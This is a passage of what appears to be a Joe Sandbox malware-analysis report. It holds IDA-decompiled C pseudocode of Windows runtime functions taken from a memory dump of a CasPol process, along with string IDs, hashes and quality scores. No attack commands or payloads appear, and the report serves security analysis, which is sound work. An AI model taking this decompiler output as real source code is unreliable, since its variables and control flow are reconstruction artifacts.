                                                                  					_t58 = E01439830();
                                                                  					_t87 =  *[fs:0x30];
                                                                  					_t108 = _t58;
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                  					if(_t108 < 0) {
                                                                  						L11:
                                                                  						_t51 = _t108;
                                                                  					} else {
                                                                  						_push(4);
                                                                  						_push(8);
                                                                  						_push( &_v36);
                                                                  						_push( &_v44);
                                                                  						_push(_v60);
                                                                  						_t108 = E01439990();
                                                                  						if(_t108 < 0) {
                                                                  							L10:
                                                                  							_push(_v60);
                                                                  							E014395D0();
                                                                  							goto L11;
                                                                  						} else {
                                                                  							_t109 = L01414620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                  							if(_t109 == 0) {
                                                                  								_t108 = 0xc0000017;
                                                                  								goto L10;
                                                                  							} else {
                                                                  								_t21 = _t109 + 0x18; // 0x18
                                                                  								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                  								 *_t109 = 1;
                                                                  								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                  								 *(_t109 + 0xe) = _t82;
                                                                  								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                  								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                  								E0143F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                  								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                  								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                  								_t91 =  *_t103 & 0x0000ffff;
                                                                  								_t100 = _t91 & 0xfffffffe;
                                                                  								_t84 = 0x5c;
                                                                  								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                  									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                  										_push(_v60);
                                                                  										E014395D0();
                                                                  										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                  										_t51 = 0xc0000106;
                                                                  									} else {
                                                                  										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                  										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                  										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                  										goto L5;
                                                                  									}
                                                                  								} else {
                                                                  									L5:
                                                                  									 *_a4 = _t109;
                                                                  									_t51 = 0;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t51;
                                                                  			}


























                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                  • Instruction ID: 2492db53f1e265e8cdd61be078a7364b9900a30423487880d9276fe2843e85f7
                                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                  • Instruction Fuzzy Hash: 94518E716047119FC321DF19C840A6BBBF8FF98714F108A2EF995876A0E7B4E944CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                  			E01473540(intOrPtr _a4) {
                                                                  				signed int _v12;
                                                                  				intOrPtr _v88;
                                                                  				intOrPtr _v92;
                                                                  				char _v96;
                                                                  				char _v352;
                                                                  				char _v1072;
                                                                  				intOrPtr _v1140;
                                                                  				intOrPtr _v1148;
                                                                  				char _v1152;
                                                                  				char _v1156;
                                                                  				char _v1160;
                                                                  				char _v1164;
                                                                  				char _v1168;
                                                                  				char* _v1172;
                                                                  				short _v1174;
                                                                  				char _v1176;
                                                                  				char _v1180;
                                                                  				char _v1192;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* __ebp;
                                                                  				short _t41;
                                                                  				short _t42;
                                                                  				intOrPtr _t80;
                                                                  				intOrPtr _t81;
                                                                  				signed int _t82;
                                                                  				void* _t83;
                                                                  
                                                                  				_v12 =  *0x14ed360 ^ _t82;
                                                                  				_t41 = 0x14;
                                                                  				_v1176 = _t41;
                                                                  				_t42 = 0x16;
                                                                  				_v1174 = _t42;
                                                                  				_v1164 = 0x100;
                                                                  				_v1172 = L"BinaryHash";
                                                                  				_t81 = E01430BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                  				if(_t81 < 0) {
                                                                  					L11:
                                                                  					_t75 = _t81;
                                                                  					L01473706(0, _t81, _t79, _t80);
                                                                  					L12:
                                                                  					if(_a4 != 0xc000047f) {
                                                                  						E0143FA60( &_v1152, 0, 0x50);
                                                                  						_v1152 = 0x60c201e;
                                                                  						_v1148 = 1;
                                                                  						_v1140 = E01473540;
                                                                  						E0143FA60( &_v1072, 0, 0x2cc);
                                                                  						_push( &_v1072);
                                                                  						L0144DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                  						L01480C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                  						_push(_v1152);
                                                                  						_push(0xffffffff);
                                                                  						L014397C0();
                                                                  					}
                                                                  					return L0143B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                  				}
                                                                  				_t79 =  &_v352;
                                                                  				_t81 = E01473971(0, _a4,  &_v352,  &_v1156);
                                                                  				if(_t81 < 0) {
                                                                  					goto L11;
                                                                  				}
                                                                  				_t75 = _v1156;
                                                                  				_t79 =  &_v1160;
                                                                  				_t81 = E01473884(_v1156,  &_v1160,  &_v1168);
                                                                  				if(_t81 >= 0) {
                                                                  					_t80 = _v1160;
                                                                  					E0143FA60( &_v96, 0, 0x50);
                                                                  					_t83 = _t83 + 0xc;
                                                                  					_push( &_v1180);
                                                                  					_push(0x50);
                                                                  					_push( &_v96);
                                                                  					_push(2);
                                                                  					_push( &_v1176);
                                                                  					_push(_v1156);
                                                                  					_t81 = L01439650();
                                                                  					if(_t81 >= 0) {
                                                                  						if(_v92 != 3 || _v88 == 0) {
                                                                  							_t81 = 0xc000090b;
                                                                  						}
                                                                  						if(_t81 >= 0) {
                                                                  							_t75 = _a4;
                                                                  							_t79 =  &_v352;
                                                                  							L01473787(_a4,  &_v352, _t80);
                                                                  						}
                                                                  					}
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                  				}
                                                                  				_push(_v1156);
                                                                  				E014395D0();
                                                                  				if(_t81 >= 0) {
                                                                  					goto L12;
                                                                  				} else {
                                                                  					goto L11;
                                                                  				}
                                                                  			}


                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: c2c4d22ad03b96e70c61b1467d5022ef7ddcdc4ad0eb248ebea10c203211514a
                                                                  • Instruction ID: 221de14f844f2c2797b0e6f63e1b44dbcbd8eed302551deb6f7202acba894419
                                                                  • Opcode Fuzzy Hash: c2c4d22ad03b96e70c61b1467d5022ef7ddcdc4ad0eb248ebea10c203211514a
                                                                  • Instruction Fuzzy Hash: 9F4157F2D0052D9BDB21DE51CC80FDEB77CAB54714F0045AAEA09AB260DB309E89DF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 72%
                                                                  			E01473884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                  				char _v8;
                                                                  				intOrPtr _v12;
                                                                  				intOrPtr* _v16;
                                                                  				char* _v20;
                                                                  				short _v22;
                                                                  				char _v24;
                                                                  				intOrPtr _t38;
                                                                  				short _t40;
                                                                  				short _t41;
                                                                  				void* _t44;
                                                                  				intOrPtr _t47;
                                                                  				void* _t48;
                                                                  
                                                                  				_v16 = __edx;
                                                                  				_t40 = 0x14;
                                                                  				_v24 = _t40;
                                                                  				_t41 = 0x16;
                                                                  				_v22 = _t41;
                                                                  				_t38 = 0;
                                                                  				_v12 = __ecx;
                                                                  				_push( &_v8);
                                                                  				_push(0);
                                                                  				_push(0);
                                                                  				_push(2);
                                                                  				_t43 =  &_v24;
                                                                  				_v20 = L"BinaryName";
                                                                  				_push( &_v24);
                                                                  				_push(__ecx);
                                                                  				_t47 = 0;
                                                                  				_t48 = L01439650();
                                                                  				if(_t48 >= 0) {
                                                                  					_t48 = 0xc000090b;
                                                                  				}
                                                                  				if(_t48 != 0xc0000023) {
                                                                  					_t44 = 0;
                                                                  					L13:
                                                                  					if(_t48 < 0) {
                                                                  						L16:
                                                                  						if(_t47 != 0) {
                                                                  							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                  						}
                                                                  						L18:
                                                                  						return _t48;
                                                                  					}
                                                                  					 *_v16 = _t38;
                                                                  					 *_a4 = _t47;
                                                                  					goto L18;
                                                                  				}
                                                                  				_t47 = L01414620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                  				if(_t47 != 0) {
                                                                  					_push( &_v8);
                                                                  					_push(_v8);
                                                                  					_push(_t47);
                                                                  					_push(2);
                                                                  					_push( &_v24);
                                                                  					_push(_v12);
                                                                  					_t48 = L01439650();
                                                                  					if(_t48 < 0) {
                                                                  						_t44 = 0;
                                                                  						goto L16;
                                                                  					}
                                                                  					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                  						_t48 = 0xc000090b;
                                                                  					}
                                                                  					_t44 = 0;
                                                                  					if(_t48 < 0) {
                                                                  						goto L16;
                                                                  					} else {
                                                                  						_t17 = _t47 + 0xc; // 0xc
                                                                  						_t38 = _t17;
                                                                  						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                  							_t48 = 0xc000090b;
                                                                  						}
                                                                  						goto L13;
                                                                  					}
                                                                  				}
                                                                  				_t48 = _t48 + 0xfffffff4;
                                                                  				goto L18;
                                                                  			}


                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: 9c28961af260cdd450728874367a84b5d4fb1f31fc3f877bbfcc505cdb5d7db9
                                                                  • Instruction ID: 03bb5f143169c1d2e6e868b0c0de07cf318b2175b57ffc94d21f45acf625095a
                                                                  • Opcode Fuzzy Hash: 9c28961af260cdd450728874367a84b5d4fb1f31fc3f877bbfcc505cdb5d7db9
                                                                  • Instruction Fuzzy Hash: 543105B290150AEFDB15DE59C945DBBBB74FB90B20F01416AE914A73A0D7309E04D7A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 33%
                                                                  			E0142D294(void* __ecx, char __edx, void* __eflags) {
                                                                  				signed int _v8;
                                                                  				char _v52;
                                                                  				signed int _v56;
                                                                  				signed int _v60;
                                                                  				intOrPtr _v64;
                                                                  				char* _v68;
                                                                  				intOrPtr _v72;
                                                                  				char _v76;
                                                                  				signed int _v84;
                                                                  				intOrPtr _v88;
                                                                  				char _v92;
                                                                  				intOrPtr _v96;
                                                                  				intOrPtr _v100;
                                                                  				char _v104;
                                                                  				char _v105;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t35;
                                                                  				char _t38;
                                                                  				signed int _t40;
                                                                  				signed int _t44;
                                                                  				signed int _t52;
                                                                  				void* _t53;
                                                                  				void* _t55;
                                                                  				void* _t61;
                                                                  				intOrPtr _t62;
                                                                  				void* _t64;
                                                                  				signed int _t65;
                                                                  				signed int _t66;
                                                                  
                                                                  				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                  				_v8 =  *0x14ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                  				_v105 = __edx;
                                                                  				_push( &_v92);
                                                                  				_t52 = 0;
                                                                  				_push(0);
                                                                  				_push(0);
                                                                  				_push( &_v104);
                                                                  				_push(0);
                                                                  				_t59 = __ecx;
                                                                  				_t55 = 2;
                                                                  				if(E01414120(_t55, __ecx) < 0) {
                                                                  					_t35 = 0;
                                                                  					L8:
                                                                  					_pop(_t61);
                                                                  					_pop(_t64);
                                                                  					_pop(_t53);
                                                                  					return L0143B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                  				}
                                                                  				_v96 = _v100;
                                                                  				_t38 = _v92;
                                                                  				if(_t38 != 0) {
                                                                  					_v104 = _t38;
                                                                  					_v100 = _v88;
                                                                  					_t40 = _v84;
                                                                  				} else {
                                                                  					_t40 = 0;
                                                                  				}
                                                                  				_v72 = _t40;
                                                                  				_v68 =  &_v104;
                                                                  				_push( &_v52);
                                                                  				_v76 = 0x18;
                                                                  				_push( &_v76);
                                                                  				_v64 = 0x40;
                                                                  				_v60 = _t52;
                                                                  				_v56 = _t52;
                                                                  				_t44 = E014398D0();
                                                                  				_t62 = _v88;
                                                                  				_t65 = _t44;
                                                                  				if(_t62 != 0) {
                                                                  					asm("lock xadd [edi], eax");
                                                                  					if((_t44 | 0xffffffff) != 0) {
                                                                  						goto L4;
                                                                  					}
                                                                  					_push( *((intOrPtr*)(_t62 + 4)));
                                                                  					E014395D0();
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                  					goto L4;
                                                                  				} else {
                                                                  					L4:
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                  					if(_t65 >= 0) {
                                                                  						_t52 = 1;
                                                                  					} else {
                                                                  						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                  							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                  						}
                                                                  					}
                                                                  					_t35 = _t52;
                                                                  					goto L8;
                                                                  				}
                                                                  			}


































                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 58793c4b78dec229d5bde1734c3a7d03f20bf17192e0922f0b0f722bdcd71dea
                                                                  • Instruction ID: 3fcc6f43a1365a886856e4e41a4e6bd4900f7aadd807d63849392880b14212d7
                                                                  • Opcode Fuzzy Hash: 58793c4b78dec229d5bde1734c3a7d03f20bf17192e0922f0b0f722bdcd71dea
                                                                  • Instruction Fuzzy Hash: 2331BFB29083159FC321DFA9C880A6BBBE8FBD9754F40092FF99483260D634DD45CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 72%
                                                                  			E01401B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                  				intOrPtr _v8;
                                                                  				char _v16;
                                                                  				intOrPtr* _t26;
                                                                  				intOrPtr _t29;
                                                                  				void* _t30;
                                                                  				signed int _t31;
                                                                  
                                                                  				_t27 = __ecx;
                                                                  				_t29 = __edx;
                                                                  				_t31 = 0;
                                                                  				_v8 = __edx;
                                                                  				if(__edx == 0) {
                                                                  					L18:
                                                                  					_t30 = 0xc000000d;
                                                                  					goto L12;
                                                                  				} else {
                                                                  					_t26 = _a4;
                                                                  					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                  						goto L18;
                                                                  					} else {
                                                                  						E0143BB40(__ecx,  &_v16, __ecx);
                                                                  						_push(_t26);
                                                                  						_push(0);
                                                                  						_push(0);
                                                                  						_push(_t29);
                                                                  						_push( &_v16);
                                                                  						_t30 = E0143A9B0();
                                                                  						if(_t30 >= 0) {
                                                                  							_t19 =  *_t26;
                                                                  							if( *_t26 != 0) {
                                                                  								goto L7;
                                                                  							} else {
                                                                  								 *_a8 =  *_a8 & 0;
                                                                  							}
                                                                  						} else {
                                                                  							if(_t30 != 0xc0000023) {
                                                                  								L9:
                                                                  								_push(_t26);
                                                                  								_push( *_t26);
                                                                  								_push(_t31);
                                                                  								_push(_v8);
                                                                  								_push( &_v16);
                                                                  								_t30 = E0143A9B0();
                                                                  								if(_t30 < 0) {
                                                                  									L12:
                                                                  									if(_t31 != 0) {
                                                                  										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                  									}
                                                                  								} else {
                                                                  									 *_a8 = _t31;
                                                                  								}
                                                                  							} else {
                                                                  								_t19 =  *_t26;
                                                                  								if( *_t26 == 0) {
                                                                  									_t31 = 0;
                                                                  								} else {
                                                                  									L7:
                                                                  									_t31 = L01414620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                  								}
                                                                  								if(_t31 == 0) {
                                                                  									_t30 = 0xc0000017;
                                                                  								} else {
                                                                  									goto L9;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t30;
                                                                  			}










                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: WindowsExcludedProcs
                                                                  • API String ID: 0-3583428290
                                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                  • Instruction ID: f571d8d8fa5e30ec05345cc0f6e0826fa4a573354aa0d47ea463e68e267de3db
                                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                  • Instruction Fuzzy Hash: D121F57A504229ABDB239E5A8840F5BBBADEF94F51F164437FE049B360D630DC0197A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 88%
                                                                  			E014C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                  				signed int _t296;
                                                                  				signed char _t298;
                                                                  				signed int _t301;
                                                                  				signed int _t306;
                                                                  				signed int _t310;
                                                                  				signed char _t311;
                                                                  				intOrPtr _t312;
                                                                  				signed int _t313;
                                                                  				void* _t327;
                                                                  				signed int _t328;
                                                                  				intOrPtr _t329;
                                                                  				intOrPtr _t333;
                                                                  				signed char _t334;
                                                                  				signed int _t336;
                                                                  				void* _t339;
                                                                  				signed int _t340;
                                                                  				signed int _t356;
                                                                  				signed int _t362;
                                                                  				short _t367;
                                                                  				short _t368;
                                                                  				short _t373;
                                                                  				signed int _t380;
                                                                  				void* _t382;
                                                                  				short _t385;
                                                                  				signed short _t392;
                                                                  				signed char _t393;
                                                                  				signed int _t395;
                                                                  				signed char _t397;
                                                                  				signed int _t398;
                                                                  				signed short _t402;
                                                                  				void* _t406;
                                                                  				signed int _t412;
                                                                  				signed char _t414;
                                                                  				signed short _t416;
                                                                  				signed int _t421;
                                                                  				signed char _t427;
                                                                  				intOrPtr _t434;
                                                                  				signed char _t435;
                                                                  				signed int _t436;
                                                                  				signed int _t442;
                                                                  				signed int _t446;
                                                                  				signed int _t447;
                                                                  				signed int _t451;
                                                                  				signed int _t453;
                                                                  				signed int _t454;
                                                                  				signed int _t455;
                                                                  				intOrPtr _t456;
                                                                  				intOrPtr* _t457;
                                                                  				short _t458;
                                                                  				signed short _t462;
                                                                  				signed int _t469;
                                                                  				intOrPtr* _t474;
                                                                  				signed int _t475;
                                                                  				signed int _t479;
                                                                  				signed int _t480;
                                                                  				signed int _t481;
                                                                  				short _t485;
                                                                  				signed int _t491;
                                                                  				signed int* _t494;
                                                                  				signed int _t498;
                                                                  				signed int _t505;
                                                                  				intOrPtr _t506;
                                                                  				signed short _t508;
                                                                  				signed int _t511;
                                                                  				void* _t517;
                                                                  				signed int _t519;
                                                                  				signed int _t522;
                                                                  				void* _t523;
                                                                  				signed int _t524;
                                                                  				void* _t528;
                                                                  				signed int _t529;
                                                                  
                                                                  				_push(0xd4);
                                                                  				_push(0x14d1178);
                                                                  				E0144D0E8(__ebx, __edi, __esi);
                                                                  				_t494 = __edx;
                                                                  				 *(_t528 - 0xcc) = __edx;
                                                                  				_t511 = __ecx;
                                                                  				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                  				 *(_t528 - 0xbc) = __ecx;
                                                                  				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                  				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                  				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                  				_t427 = 0;
                                                                  				 *(_t528 - 0x74) = 0;
                                                                  				 *(_t528 - 0x9c) = 0;
                                                                  				 *(_t528 - 0x84) = 0;
                                                                  				 *(_t528 - 0xac) = 0;
                                                                  				 *(_t528 - 0x88) = 0;
                                                                  				 *(_t528 - 0xa8) = 0;
                                                                  				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                  				if( *(_t528 + 0x1c) <= 0x80) {
                                                                  					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                  					if(__eflags != 0) {
                                                                  						_t421 = L014C4C56(0, __edx, __ecx, __eflags);
                                                                  						__eflags = _t421;
                                                                  						if(_t421 != 0) {
                                                                  							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                  							E0143D000(0x410);
                                                                  							 *(_t528 - 0x18) = _t529;
                                                                  							 *(_t528 - 0x9c) = _t529;
                                                                  							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                  							E014C5542(_t528 - 0x9c, _t528 - 0x84);
                                                                  						}
                                                                  					}
                                                                  					_t435 = _t427;
                                                                  					 *(_t528 - 0xd0) = _t435;
                                                                  					_t474 = _t511 + 0x65;
                                                                  					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                  					_t511 = 0x18;
                                                                  					while(1) {
                                                                  						 *(_t528 - 0xa0) = _t427;
                                                                  						 *(_t528 - 0xbc) = _t427;
                                                                  						 *(_t528 - 0x80) = _t427;
                                                                  						 *(_t528 - 0x78) = 0x50;
                                                                  						 *(_t528 - 0x79) = _t427;
                                                                  						 *(_t528 - 0x7a) = _t427;
                                                                  						 *(_t528 - 0x8c) = _t427;
                                                                  						 *(_t528 - 0x98) = _t427;
                                                                  						 *(_t528 - 0x90) = _t427;
                                                                  						 *(_t528 - 0xb0) = _t427;
                                                                  						 *(_t528 - 0xb8) = _t427;
                                                                  						_t296 = 1 << _t435;
                                                                  						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                  						__eflags = _t436 & _t296;
                                                                  						if((_t436 & _t296) != 0) {
                                                                  							goto L92;
                                                                  						}
                                                                  						__eflags =  *((char*)(_t474 - 1));
                                                                  						if( *((char*)(_t474 - 1)) == 0) {
                                                                  							goto L92;
                                                                  						}
                                                                  						_t301 =  *_t474;
                                                                  						__eflags = _t494[1] - _t301;
                                                                  						if(_t494[1] <= _t301) {
                                                                  							L10:
                                                                  							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                  							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                  								L12:
                                                                  								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                  								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                  									goto L92;
                                                                  								}
                                                                  								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                  								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                  								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                  									goto L92;
                                                                  								}
                                                                  								__eflags = _t442 -  *(_t474 - 0x11);
                                                                  								if(_t442 !=  *(_t474 - 0x11)) {
                                                                  									goto L92;
                                                                  								}
                                                                  								L15:
                                                                  								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                  								 *(_t528 - 0xc0) = _t306;
                                                                  								 *(_t528 - 0xa4) = _t306;
                                                                  								__eflags =  *0x14e60e8;
                                                                  								if( *0x14e60e8 != 0) {
                                                                  									__eflags = _t306 - 0x40;
                                                                  									if(_t306 < 0x40) {
                                                                  										L20:
                                                                  										asm("lock inc dword [eax]");
                                                                  										_t310 =  *0x14e60e8; // 0x0
                                                                  										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                  										__eflags = _t311 & 0x00000001;
                                                                  										if((_t311 & 0x00000001) == 0) {
                                                                  											 *(_t528 - 0xa0) = _t311;
                                                                  											_t475 = _t427;
                                                                  											 *(_t528 - 0x74) = _t427;
                                                                  											__eflags = _t475;
                                                                  											if(_t475 != 0) {
                                                                  												L91:
                                                                  												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                  												goto L92;
                                                                  											}
                                                                  											asm("sbb edi, edi");
                                                                  											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                  											_t511 = _t498;
                                                                  											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                  											__eflags =  *(_t312 - 5) & 1;
                                                                  											if(( *(_t312 - 5) & 1) != 0) {
                                                                  												_push(_t528 - 0x98);
                                                                  												_push(0x4c);
                                                                  												_push(_t528 - 0x70);
                                                                  												_push(1);
                                                                  												_push(0xfffffffa);
                                                                  												_t412 = E01439710();
                                                                  												_t475 = _t427;
                                                                  												__eflags = _t412;
                                                                  												if(_t412 >= 0) {
                                                                  													_t414 =  *(_t528 - 0x98) - 8;
                                                                  													 *(_t528 - 0x98) = _t414;
                                                                  													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                  													 *(_t528 - 0x8c) = _t416;
                                                                  													 *(_t528 - 0x79) = 1;
                                                                  													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                  													__eflags = _t511;
                                                                  												}
                                                                  											}
                                                                  											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                  											__eflags = _t446 & 0x00000004;
                                                                  											if((_t446 & 0x00000004) != 0) {
                                                                  												__eflags =  *(_t528 - 0x9c);
                                                                  												if( *(_t528 - 0x9c) != 0) {
                                                                  													 *(_t528 - 0x7a) = 1;
                                                                  													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                  													__eflags = _t511;
                                                                  												}
                                                                  											}
                                                                  											_t313 = 2;
                                                                  											_t447 = _t446 & _t313;
                                                                  											__eflags = _t447;
                                                                  											 *(_t528 - 0xd4) = _t447;
                                                                  											if(_t447 != 0) {
                                                                  												_t406 = 0x10;
                                                                  												_t511 = _t511 + _t406;
                                                                  												__eflags = _t511;
                                                                  											}
                                                                  											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                  											 *(_t528 - 0x88) = _t427;
                                                                  											__eflags =  *(_t528 + 0x1c);
                                                                  											if( *(_t528 + 0x1c) <= 0) {
                                                                  												L45:
                                                                  												__eflags =  *(_t528 - 0xb0);
                                                                  												if( *(_t528 - 0xb0) != 0) {
                                                                  													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                  													__eflags = _t511;
                                                                  												}
                                                                  												__eflags = _t475;
                                                                  												if(_t475 != 0) {
                                                                  													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                  													goto L100;
                                                                  												} else {
                                                                  													_t494[3] = _t511;
                                                                  													_t451 =  *(_t528 - 0xa0);
                                                                  													_t427 = L01436DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                  													 *(_t528 - 0x88) = _t427;
                                                                  													__eflags = _t427;
                                                                  													if(_t427 == 0) {
                                                                  														__eflags = _t511 - 0xfff8;
                                                                  														if(_t511 <= 0xfff8) {
                                                                  															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                  															asm("sbb ecx, ecx");
                                                                  															__eflags = (_t451 & 0x000000e2) + 8;
                                                                  														}
                                                                  														asm("lock dec dword [eax+edx*8+0x4]");
                                                                  														L100:
                                                                  														goto L101;
                                                                  													}
                                                                  													_t453 =  *(_t528 - 0xa0);
                                                                  													 *_t494 = _t453;
                                                                  													_t494[1] = _t427;
                                                                  													_t494[2] =  *(_t528 - 0xbc);
                                                                  													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                  													 *_t427 =  *(_t453 + 0x24) | _t511;
